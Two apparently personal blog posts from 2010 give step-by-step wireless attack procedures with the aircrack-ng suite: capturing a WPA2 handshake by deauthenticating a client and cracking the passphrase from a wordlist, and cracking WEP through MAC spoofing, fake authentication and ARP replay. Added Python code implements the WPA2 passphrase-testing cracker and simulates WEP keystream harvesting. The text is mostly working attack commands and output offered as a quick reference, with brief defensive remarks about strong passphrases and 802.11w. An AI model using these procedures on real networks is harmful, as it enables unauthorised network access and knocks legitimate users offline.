Hacking WPA2 Wireless Networks…

June 20, 2010 at 7:17 pm (Security, Wireless)

Hey,

I decided to document how to break into a WPA2-enabled wireless network, so I set up my LinkSys WRT54G wireless router over the weekend. Here is how I broke into it:

First make sure the card is not already running in monitor mode:

root@bt:~# airmon-ng stop wlan0
Interface       Chipset         Driver
wlan0           ZyDAS 1211      zd1211rw - [phy1]
(monitor mode disabled)

Then start the wireless card in monitor mode. Note that airmon-ng creates a separate monitor interface, mon0, which is the interface used in every command from here on:

root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wlan0           ZyDAS 1211      zd1211rw - [phy1]
(monitor mode enabled on mon0)

Now we run airodump-ng filtered to our target access point (HackMe) so that it captures only that AP, its clients and the handshake we are after: --bssid selects the AP, --channel 6 locks the card onto its channel (the deauth injection in the next step needs the card on that channel anyway), and --write saves everything to a capture file named after the prefix (airodump-ng appends -01, giving HackMe-Demo-01.cap):

root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0

 CH  6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:0C:41:9D:C7:5C    0 100      316       38    0   6  54   WPA2 CCMP   PSK  HackMe

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:0C:41:9D:C7:5C  00:21:5C:90:2D:89    0    1 - 1    126      456  HackMe

root@bt:~#

While airodump-ng keeps capturing, we can speed things up with aireplay-ng instead of waiting for a client to connect on its own. The -0 1 option sends one burst of deauthentication frames (64 of them, as the output shows) spoofed from the AP (-a) to the chosen client (-c). The client drops off and immediately re-associates, performing a fresh 4-way handshake that airodump-ng records. This works because 802.11 management frames carry no authentication unless the network uses 802.11w (management frame protection), in which case the forged deauths are simply ignored:

root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#

Excellent, the airodump-ng status line now reports the handshake:

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

Now we run aircrack-ng against the capture file to recover the passphrase: -a 2 selects WPA-PSK mode, -b and -e name the target BSSID and ESSID (the ESSID matters because it is the salt in the PBKDF2 derivation of the master key), and -w supplies the wordlist. For each candidate passphrase aircrack-ng derives a master key, a transient key and a MIC, and compares that MIC with the one in the captured handshake:
root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1729

                   [00:00:00] 4 keys tested (67.32 k/s)

                           KEY FOUND! [ password ]

      Master Key     : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
                       BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32

      Transient Key  : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
                       AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
                       D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
                       C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66

      EAPOL HMAC     : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#

Yay! We got the passphrase, which was “password” 🙂

Two things worth taking away. Nothing in WPA2 itself was broken here: the captured handshake only gives an attacker an offline way to test guesses, and the attack succeeded because “password” was in password.txt. Every guess costs a PBKDF2 derivation of 4096 HMAC-SHA1 rounds, salted with the ESSID (hence the modest 67 k/s above), so a network with a unique name and a long random passphrase is out of reach of a wordlist attack like this. In the output, Master Key is the PMK derived from the passphrase and ESSID, Transient Key is the PTK derived from the PMK, both MAC addresses and both nonces, and EAPOL HMAC is the MIC that confirmed the guess.
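To make the cracking step concrete, here is the computation aircrack-ng -a 2 performs per candidate, written out in Python. This is an added example, not code from the post or from the aircrack-ng project. The BSSID, client MAC and ESSID are taken from the capture above; the two nonces, the RSN information element and the "captured" message 2 are constructed here (a real run would read ANonce from message 1 and SNonce plus the MIC from message 2 of the .cap file), and the wordlist is a stand-in for password.txt.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Addresses and ESSID taken from the airodump-ng output above.
AP_MAC = bytes.fromhex("000C419DC75C")   # authenticator (BSSID)
STA_MAC = bytes.fromhex("00215C902D89")  # supplicant (client)
SSID = b"HackMe"

# Constructed nonces: a real run reads ANonce from message 1 and SNonce from message 2 of the capture.
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

# Typical WPA2-PSK/CCMP RSN information element, carried as key data in message 2 (constructed value).
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); aircrack-ng prints it as 'Master Key'."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, length: int = 64) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    aircrack-ng prints this as 'Transient Key'; its first 16 bytes are the KCK that keys the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes, descriptor_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed ('EAPOL HMAC' in aircrack-ng).
    Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if descriptor_version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version (3 = AES-CMAC, used with 802.11w suites)")


def build_message2(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = RSN_IE) -> bytes:
    """Constructed message 2 of the 4-way handshake: EAPOL-Key, RSN descriptor (0x02), key info 0x010a
    (version 2, pairwise, MIC present), replay counter 1, SNonce, zero IV/RSC/ID, MIC, key data."""
    body = (b"\x02" + (0x010A).to_bytes(2, "big") + b"\x00\x00" + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(wordlist: Iterable[str], ssid: bytes, aa: bytes, spa: bytes,
              anonce: bytes, snonce: bytes, eapol_frame: bytes) -> Optional[str]:
    """Per candidate: derive PMK and KCK, recompute the MIC, compare with the captured one."""
    key_info = int.from_bytes(eapol_frame[5:7], "big")
    version = key_info & 0x0007
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8-63 characters; aircrack-ng skips others too
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if eapol_mic(kck, eapol_frame, version) == captured_mic:
            return candidate
    return None


def make_captured_message2(passphrase: str) -> bytes:
    """Stand-in for the frame airodump-ng captured: message 2 with a MIC computed from the real passphrase."""
    unsigned = build_message2(SNONCE)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_message2(SNONCE, mic=eapol_mic(kck, unsigned, 2))


CAPTURED_MSG2 = make_captured_message2("password")            # constructed capture
WORDLIST = ["letmein", "wireless", "password", "HackMe2010"]  # constructed stand-in for password.txt


def demo() -> Optional[str]:
    return crack_psk(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2)


if __name__ == "__main__":
    found = demo()
    print("KEY FOUND! [ %s ]" % found if found else "Passphrase not in wordlist")
```

Because the PMK depends only on the passphrase and ESSID, pmk_from_passphrase("password", SSID).hex() can be checked against the Master Key line aircrack-ng printed above; the Transient Key and EAPOL HMAC will differ here because the nonces are constructed rather than read from the capture. The loop also makes the cost model visible: the PBKDF2 call dominates, and it has to be repeated for every candidate and every distinct ESSID.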


Hacking WEP Encrypted Wireless Network Notes

May 15, 2010 at 4:09 pm (Security, Wireless)

Hey, this is just a quick post to outline the steps involved in cracking WEP-protected wireless networks using the aircrack-ng suite. Follow these steps:

1 ) airmon-ng
Find the network adapter interface to use…

2 ) airmon-ng stop wlan0
Stop the interface.

3 ) ifconfig wlan0 down
Bring the interface down.

4 ) macchanger --mac 00:11:22:33:44:55 wlan0
Assign a spoofed MAC address to the interface (it has to be down for this, which step 3 took care of).

5 ) airmon-ng start wlan0
Bring the interface back up in monitor mode. With mac80211 drivers airmon-ng creates a separate monitor interface (mon0, as in the WPA2 post above); if it does, use that interface in place of wlan0 for the rest of the steps.

6 ) airodump-ng wlan0
Take a look to see what networks are available.

Choose the target, grab the essential bits of information: (Victim MAC Address, BSSID, ESSID, Channel).

7 ) airodump-ng -c CHANNEL_NUMBER -w FILENAME --bssid VICTIM_MAC wlan0
Lock onto the target's channel and start capturing to FILENAME. Every WEP data frame carries a 24-bit IV, and the #Data column shows how many have been collected; those IVs are what the final step consumes.

8 ) aireplay-ng -1 0 -a VICTIM_MAC -h 00:11:22:33:44:55 -e VICTIM_ESSID wlan0
Fake-authenticate with the access point using the spoofed MAC. The AP only accepts frames from an associated station, so without this step the injected packets in step 9 are silently dropped.

9 ) aireplay-ng -3 -b VICTIM_MAC -h 00:11:22:33:44:55 wlan0
Wait for an ARP request from the network and replay it to the AP over and over. Each replay makes the AP send out a new encrypted frame with a fresh IV, which is what drives the #Data count up far faster than waiting for normal traffic.

10 ) aircrack-ng -n 64 -b VICTIM_MAC *.cap
Crack the key 🙂 -n 64 restricts the search to 40-bit keys (64-bit WEP); leave it out to have aircrack-ng try 104-bit (128-bit WEP) keys as well. It can be started while airodump-ng is still capturing: if an attempt fails it waits for more IVs and retries.

This is a nice quick reference for hacking WEP encrypted wireless networks.
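Steps 7 and 9 above only make sense once you see what an IV is worth to the attacker, so here is an added Python example (not code from the post or from aircrack-ng) that simulates the capture during ARP replay. It encrypts constructed ARP frames with WEP (RC4 keyed with IV||key, CRC-32 ICV) under a constructed 40-bit key, then does the first thing the cracker does with them: XOR the ciphertext with the fixed LLC/SNAP header every ARP frame starts with, which yields keystream bytes for every distinct IV. The statistical key recovery itself (the FMS/KoreK/PTW analysis of those keystreams) is left to aircrack-ng and is not implemented here.

```python
import random
import struct
import zlib

# 802.2 LLC/SNAP header that starts every ARP frame: the known plaintext the attack relies on.
LLC_SNAP_ARP = bytes.fromhex("AAAA030000000806")

WEP_KEY = bytes.fromhex("0102030405")  # constructed 40-bit key (the '-n 64' case: 40-bit key + 24-bit IV)


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the pseudo-random generation algorithm."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) || key-id(1) || RC4(IV||key) applied to plaintext || CRC-32 ICV."""
    icv = struct.pack("<I", zlib.crc32(plaintext))
    keystream = rc4_keystream(iv + wep_key, len(plaintext) + 4)
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plaintext + icv, keystream))


def keystream_from_known_plaintext(frame_body: bytes, known: bytes = LLC_SNAP_ARP):
    """Recover keystream bytes for this frame's IV: ciphertext XOR known plaintext. The IV is sent in the clear."""
    iv = frame_body[:3]
    ciphertext = frame_body[4:4 + len(known)]
    return iv, bytes(c ^ p for c, p in zip(ciphertext, known))


def capture_arp_traffic(wep_key: bytes, count: int, seed: int = 1) -> list:
    """Constructed stand-in for the airodump-ng capture during ARP replay: each reply from the AP carries a
    fresh random IV, which is exactly why aireplay-ng -3 is used to generate traffic."""
    rng = random.Random(seed)
    arp_frame = LLC_SNAP_ARP + bytes(28)  # the 28-byte ARP payload contents are irrelevant here
    frames = []
    for _ in range(count):
        iv = rng.getrandbits(24).to_bytes(3, "big")
        frames.append(wep_encrypt(wep_key, iv, arp_frame))
    return frames


def harvest_keystreams(frames: list) -> dict:
    """IV -> first 8 keystream bytes. The number of distinct IVs is the figure that matters for the cracker;
    a repeated IV adds nothing new (and is itself a weakness: two frames under one IV leak plaintext XOR)."""
    table = {}
    for body in frames:
        iv, ks = keystream_from_known_plaintext(body)
        table.setdefault(iv, ks)
    return table


def demo(count: int = 2000) -> dict:
    return harvest_keystreams(capture_arp_traffic(WEP_KEY, count))


if __name__ == "__main__":
    table = demo()
    print("%d distinct IVs, 8 keystream bytes recovered for each" % len(table))
```

The keystream recovered for an IV is identical to what RC4 produces from IV||key, so every captured ARP frame hands the attacker a (IV, keystream prefix) pair for free; the IV space is only 2^24, and the per-IV keystreams are what the statistical attacks in aircrack-ng turn into the key. That is the whole reason the procedure is built around collecting as many distinct IVs as possible rather than around the key directly.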
